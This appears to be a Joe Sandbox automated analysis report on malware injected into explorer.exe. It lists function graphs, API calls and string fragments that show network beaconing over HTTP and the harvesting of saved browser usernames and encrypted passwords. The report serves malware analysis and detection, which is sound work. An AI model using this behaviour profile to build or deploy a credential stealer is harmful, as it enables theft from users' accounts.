27042->26997 27043->27016 27044->26997 27045->27005 27046->26997 27047->27022 27048->26997 27049->27026 27050->26997

                                            Executed Functions

                                            Function 10474F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 10474f82-10474fb6 1 10474fd6-10474fd9 0->1 2 10474fb8-10474fbc 0->2 4 10474fdf-10474fed 1->4 5 104758fe-1047590c 1->5 2->1 3 10474fbe-10474fc2 2->3 3->1 6 10474fc4-10474fc8 3->6 7 104758f6-104758f7 4->7 8 10474ff3-10474ff7 4->8 6->1 9 10474fca-10474fce 6->9 7->5 10 10474fff-10475000 8->10 11 10474ff9-10474ffd 8->11 9->1 12 10474fd0-10474fd4 9->12 13 1047500a-10475010 10->13 11->10 11->13 12->1 12->4 14 10475012-10475020 13->14 15 1047503a-10475060 13->15 14->15 18 10475022-10475026 14->18 16 10475062-10475066 15->16 17 10475068-1047507c call 104715b2 15->17 16->17 19 104750a8-104750ab 16->19 22 10475081-104750a2 17->22 18->7 21 1047502c-10475035 18->21 23 10475144-10475150 19->23 24 104750b1-104750b8 19->24 21->7 22->19 26 104758ee-104758ef 22->26 25 10475156-10475165 23->25 23->26 27 104750e2-104750f5 24->27 28 104750ba-104750dc call 10474942 24->28 29 10475167-10475178 call 10471552 25->29 30 1047517f-1047518f 25->30 26->7 27->26 32 104750fb-10475101 27->32 28->27 29->30 34 104751e5-1047521b 30->34 35 10475191-104751ad call 10471732 30->35 32->26 37 10475107-10475109 32->37 41 1047522d-10475231 34->41 42 1047521d-1047522b 34->42 46 104751b2-104751da 35->46 37->26 38 1047510f-10475111 37->38 38->26 45 10475117-10475132 getaddrinfo 38->45 43 10475247-1047524b 41->43 44 10475233-10475245 41->44 47 1047527f-10475280 42->47 48 10475261-10475265 43->48 49 1047524d-1047525f 43->49 44->47 45->23 50 10475134-1047513c 45->50 46->34 52 104751dc-104751e1 46->52 51 10475283-104752e0 call 10475d62 call 10472482 call 10471e72 call 10476002 47->51 53 10475267-1047526b 48->53 54 1047526d-10475279 48->54 49->47 50->23 63 104752f4-10475354 call 10475d92 51->63 64 104752e2-104752e6 51->64 52->34 53->51 53->54 54->47 69 1047548c-104754b8 call 10475d62 call 10476262 63->69 70 1047535a-10475396 call 10475d62 call 10476262 call 10476002 63->70 64->63 65 104752e8-104752ef call 10472042 64->65 65->63 79 104754ba-104754d5 69->79 80 104754d9-10475590 call 10476262 * 3 call 10476002 * 2 call 10472482 69->80 85 104753bb-104753e9 call 10476262 * 2 70->85 86 10475398-104753b7 call 10476262 call 10476002 70->86 79->80 111 10475595-104755b9 call 10476262 80->111 101 10475415-1047541d 85->101 102 104753eb-10475410 call 10476002 call 10476262 85->102 86->85 105 10475442-10475448 101->105 106 1047541f-10475425 101->106 102->101 105->111 112 1047544e-10475456 105->112 109 10475467-10475487 call 10476262 106->109 110 10475427-1047543d 106->110 109->111 110->111 121 104755d1-104756ad call 10476262 * 7 call 10476002 call 10475d62 call 10476002 call 10471e72 call 10472042 111->121 122 104755bb-104755cc call 10476262 call 10476002 111->122 112->111 113 1047545c-1047545d 112->113 113->109 132 104756af-104756b3 121->132 122->132 135 104756b5-104756fa call 10471382 call 104717b2 132->135 136 104756ff-1047572d call 104716b2 132->136 152 104758e6-104758e7 135->152 143 1047572f-10475735 136->143 144 1047575d-10475761 136->144 143->144 148 10475737-1047574c 143->148 149 10475767-1047576b 144->149 150 1047590d-10475913 144->150 148->144 153 1047574e-10475754 148->153 156 10475771-10475773 149->156 157 104758aa-104758df call 104717b2 149->157 154 10475779-10475784 150->154 155 10475919-10475920 150->155 152->26 153->144 160 10475756 153->160 161 10475786-10475793 154->161 162 10475795-10475796 154->162 155->161 156->154 156->157 157->152 160->144 161->162 165 1047579c-104757a0 161->165 162->165 167 104757a2-104757af 165->167 168 104757b1-104757b2 165->168 167->168 170 104757b8-104757c4 167->170 168->170 173 104757c6-104757ef call 10475d92 call 10475d62 170->173 174 104757f4-10475861 setsockopt recv 170->174 173->174 177 104758a3-104758a4 174->177 178 10475863 174->178 177->157 178->177 181 10475865-1047586a 178->181 181->177 184 1047586c-10475872 181->184 184->177 186 10475874-104758a1 184->186 186->177 186->178
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction ID: d55c51278006004f01d95d5ea2325851a5ae3e100d93a0b36261f1dd33ab7c5f
                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction Fuzzy Hash: 99529F30614A888BC759EF68C4C47D9B7E1FB58304F51866ED49FCB242EE78B946CB81
                                            Function 10474232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 303 10474232-10474256 304 104748bd-104748cd 303->304 305 1047425c-10474260 303->305 305->304 306 10474266-104742a0 305->306 307 104742a2-104742a6 306->307 308 104742bf 306->308 307->308 310 104742a8-104742ac 307->310 309 104742c6 308->309 311 104742cb-104742cf 309->311 312 104742b4-104742b8 310->312 313 104742ae-104742b2 310->313 315 104742d1-104742f7 call 10474942 311->315 316 104742f9-1047430b 311->316 312->311 314 104742ba-104742bd 312->314 313->309 314->311 315->316 320 10474378 315->320 316->320 321 1047430d-10474332 316->321 322 1047437a-104743a0 320->322 323 10474334-1047433b 321->323 324 104743a1-104743a8 321->324 327 10474366-10474370 323->327 328 1047433d-10474360 call 10474942 323->328 325 104743d5-104743dc 324->325 326 104743aa-104743d3 call 10474942 324->326 331 10474410-10474458 NtCreateFile call 10474172 325->331 332 104743de-1047440a call 10474942 325->332 326->320 326->325 327->320 329 10474372-10474373 327->329 328->327 329->320 339 1047445d-1047445f 331->339 332->320 332->331 339->320 340 10474465-1047446d 339->340 340->320 341 10474473-10474476 340->341 342 10474486-1047448d 341->342 343 10474478-10474481 341->343 344 104744c2-104744ec 342->344 345 1047448f-104744b8 call 10474942 342->345 343->322 351 104744f2-104744f5 344->351 352 104748ae-104748b8 344->352 345->320 350 104744be-104744bf 345->350 350->344 353 10474604-10474611 351->353 354 104744fb-104744fe 351->354 352->320 353->322 356 10474500-10474507 354->356 357 1047455e-10474561 354->357 359 10474509-10474532 call 10474942 356->359 360 10474538-10474559 356->360 361 10474567-10474572 357->361 362 10474616-10474619 357->362 359->320 359->360 366 104745e9-104745fa 360->366 367 10474574-1047459d call 10474942 361->367 368 104745a3-104745a6 361->368 364 1047461f-10474626 362->364 365 104746b8-104746bb 362->365 370 10474657-1047466b call 10475e92 364->370 371 10474628-10474651 call 10474942 364->371 374 104746bd-104746c4 365->374 375 10474739-1047473c 365->375 366->353 367->320 367->368 368->320 373 104745ac-104745b6 368->373 370->320 394 10474671-104746b3 370->394 371->320 371->370 373->320 383 104745bc-104745e6 373->383 376 104746c6-104746ef call 10474942 374->376 377 104746f5-10474734 374->377 380 104747c4-104747c7 375->380 381 10474742-10474749 375->381 376->352 376->377 399 10474894-104748a9 377->399 380->320 389 104747cd-104747d4 380->389 387 1047474b-10474774 call 10474942 381->387 388 1047477a-104747bf 381->388 383->366 387->352 387->388 388->399 390 104747d6-104747f6 call 10474942 389->390 391 104747fc-10474803 389->391 390->391 397 10474805-10474825 call 10474942 391->397 398 1047482b-10474835 391->398 394->322 397->398 398->352 404 10474837-1047483e 398->404 399->322 404->352 407 10474840-10474886 404->407 407->399
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction ID: 65f4400a4669143ffd6e827b13eca951cd1d4f87b01fc057d00751fa83bfe13c
                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction Fuzzy Hash: 34225A70B18A499FCB89DF28C4956EAF7E1FB98305F41422EE55ED3250DF34A851CB82
                                            Function 10475E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 447 10475e12-10475e38 448 10475e45-10475e6e NtProtectVirtualMemory 447->448 449 10475e40 call 10474942 447->449 450 10475e70-10475e7c 448->450 451 10475e7d-10475e8f 448->451 449->448
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 10475E67
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction ID: 094b9b26a3db708152c448631b6692a56f4e1381df72b872cfd1b8d8f8746bd6
                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction Fuzzy Hash: 9D019E34628B884F8788EF6CD48116AB7E4FBD9214F000B3EE99AC7250EB74C5414782
                                            Function 10475E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 452 10475e0a-10475e6e call 10474942 NtProtectVirtualMemory 455 10475e70-10475e7c 452->455 456 10475e7d-10475e8f 452->456
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 10475E67
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction ID: 91c0e68993bfe8efd9ab70558c0d38e277866c38d54469b49d296a38bd4c8daa
                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction Fuzzy Hash: 3401A274628B884B8788EB3C94412A6B3E5FBCE314F004B3EE99AC3240EB75D5024782
                                            Function 1046F8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 1046F9A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: f5fb7636cb22381c6f896226f98d8766de0bde04856b0b86b7a123956680d3ba
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: 7531B171614A4C8BCB44EFA8C8857EEB7E1FB58218F40422EE45ED7240EF789645C789
                                            Function 1046F8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 1046F9A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: cb59b9165acd548f2b649eafbed4f30264b5cf6ba6de121877e568bb3b501a50
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 6C21A571614A4C8BCB45DFA8C8857EE7BF1FF58248F40821EE45AD7240EF789645C789
                                            Function 1046BB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 232 1046bb66-1046bb68 233 1046bb93-1046bbb8 232->233 234 1046bb6a-1046bb6b 232->234 237 1046bbbb-1046bbbc 233->237 235 1046bbbe-1046bc22 call 10472612 call 10474942 * 2 234->235 236 1046bb6d-1046bb71 234->236 246 1046bcdc 235->246 247 1046bc28-1046bc2b 235->247 236->237 238 1046bb73-1046bb92 236->238 237->235 238->233 248 1046bcde-1046bcf6 246->248 247->246 249 1046bc31-1046bcd3 call 10476da4 call 10476022 call 104763e2 call 10476022 call 104763e2 CreateMutexW 247->249 249->246 263 1046bcd5-1046bcda 249->263 263->248
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction ID: 9d04357d84a0f163ac5fb7b8f225fe65751b7aba1d24e59805be98e2dd12cab9
                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction Fuzzy Hash: 6F416A74918A088FDB84EFA8C4D57ED77E1FB58304F00416ED84ADB255EE349A85CB85
                                            Function 1046BB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction ID: b8da2c92fdfd93f7573d4afba636ef75b1d991ad9384e900bcebf239f857a701
                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction Fuzzy Hash: D7413A74918A088FDB84EFA8C4D9BED77E1FF68304F00416ED84ADB255EE349A45CB85
                                            Function 1047172E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 293 1047172e-10471768 294 1047176a-10471782 call 10474942 293->294 295 10471788-104717ab connect 293->295 294->295
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction ID: 572f36df4ae5fdacba30605cd85dd731d97ca9201bb870cb9f396751611ca6f7
                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction Fuzzy Hash: D1015E70618B188FCB84EF1CE088B55B7E0FB58314F1545AEE90DCB226CB74D8818BC2
                                            Function 10471732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 298 10471732-10471768 299 1047176a-10471782 call 10474942 298->299 300 10471788-104717ab connect 298->300 299->300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction ID: a1760b20c6be13a20fab86fb875a5ff2114651940ca7003a99e77d12983eb61f
                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction Fuzzy Hash: 76012C70618A1C8FCB88EF5CE089B55B7E0FB59314F1541AEA90DCB226CB74C9818BC2
                                            Function 104716B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 411 104716b2-104716e5 412 104716e7-104716ff call 10474942 411->412 413 10471705-1047172d send 411->413 412->413
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction ID: b57a9e4ab0b21d9ad098effbd362a7b9ba15710a00f7c416418d8f724d1575f9
                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction Fuzzy Hash: 44015270518A088FCB88DF1CD088B6577E0EB58314F1645AED85DCB266CA70D8818B81
                                            Function 104715B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 416 104715b2-104715ea 417 104715ec-10471604 call 10474942 416->417 418 1047160a-1047162b socket 416->418 417->418
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction ID: a74008eecad9ef5c301e144f85feb411fc1ce5f338446d8b81a48fd443f23c08
                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction Fuzzy Hash: 320171706186188FC784DF1CD048B51BBE0FB59354F1545ADE40ECB226C7B4C9818B82
                                            Function 104692DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 421 104692dd-10469320 call 10474942 424 10469326 421->424 425 104693fa-1046940e 421->425 426 10469328-10469339 SleepEx 424->426 426->426 427 1046933b-10469341 426->427 428 10469343-10469349 427->428 429 1046934b-10469352 427->429 428->429 430 1046935c-1046936a call 10473f12 428->430 431 10469354-1046935a 429->431 432 10469370-10469376 429->432 430->432 431->430 431->432 433 104693b7-104693bd 432->433 434 10469378-1046937e 432->434 437 104693d4-104693db 433->437 438 104693bf-104693cf call 10469e72 433->438 434->433 436 10469380-1046938a 434->436 436->433 440 1046938c-104693b1 call 1046a432 436->440 437->426 442 104693e1-104693f5 call 104690f2 437->442 438->437 440->433 442->426
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction ID: 5ed4099f32bb5b3f0ac9f3622c1a4b1e46909dccb650c303a93f5fbeb190ff96
                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction Fuzzy Hash: 7C316A78604B49DADB94DF2980882D5B7A4FB58304F44826ECD1DCA346DBB8A890CF91
                                            Function 10469412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 457 10469412-10469446 call 10474942 460 10469473-1046947d 457->460 461 10469448-10469472 call 10476c9e CreateThread 457->461
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction ID: aeb94a74c96780c8426590681e5b2a77d2d13f0e629b05cf0d47d19497a79246
                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction Fuzzy Hash: 40F02234228A080FD788EF2CD48167AB3D0EBEC204F40463EA68DC3220DE38D9824706

                                            Non-executed Functions

                                            Function 10354D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 6366140b786167c64abf4fff402dfb41f0b7f5898c074f01eb4a5b81f8ce96ac
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: E1E16C74618F488FC7A8DF68C495BAAB7E0FB58300F504A2EA59FC7251DF30A545CB85
                                            Function 10ABDD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 25c18e59557e350efaffd9bbcb2e6b2309bf086f10e3291a038fc586307ab2dd
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: ECE17974618F488FC7A5DF68C585BAAB7E0FB58300F514A2EA59FC7245DF30A501CB8A
                                            Function 10C07D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: abcd2cfd66f11bcef9a0bcf72b97eff969a9d76f9d47dc3f55704eaa71a8c21f
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: 38E16878618B488FCBA4DF68C4947ABB7E0FB58300F504A2EA59FC7255DF30A541CB89
                                            Function 10357792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: ced0b84784fcef8f47cfe13e4e17719d6c31d89a52145b1e85d98769b721497b
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: A6B19D74518B488FDB55EF68C486AEEB7F1FF58300F50451EE49ACB261EF70A4098B86
                                            Function 10AC0792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: 6f34a410f163cf154f81d6d9b95b4330caa6a75dc451d2b66b926a94c8b01af7
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: 41B18A34518B488FDB55EF68C58AAEEB7F1FF98300F50451EE49AC7251EF70A4098B86
                                            Function 10C0A792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: ab096684c62b4fa6dee599cd0786e4e5e1695c46f6b37e6d42e0212ff82979dc
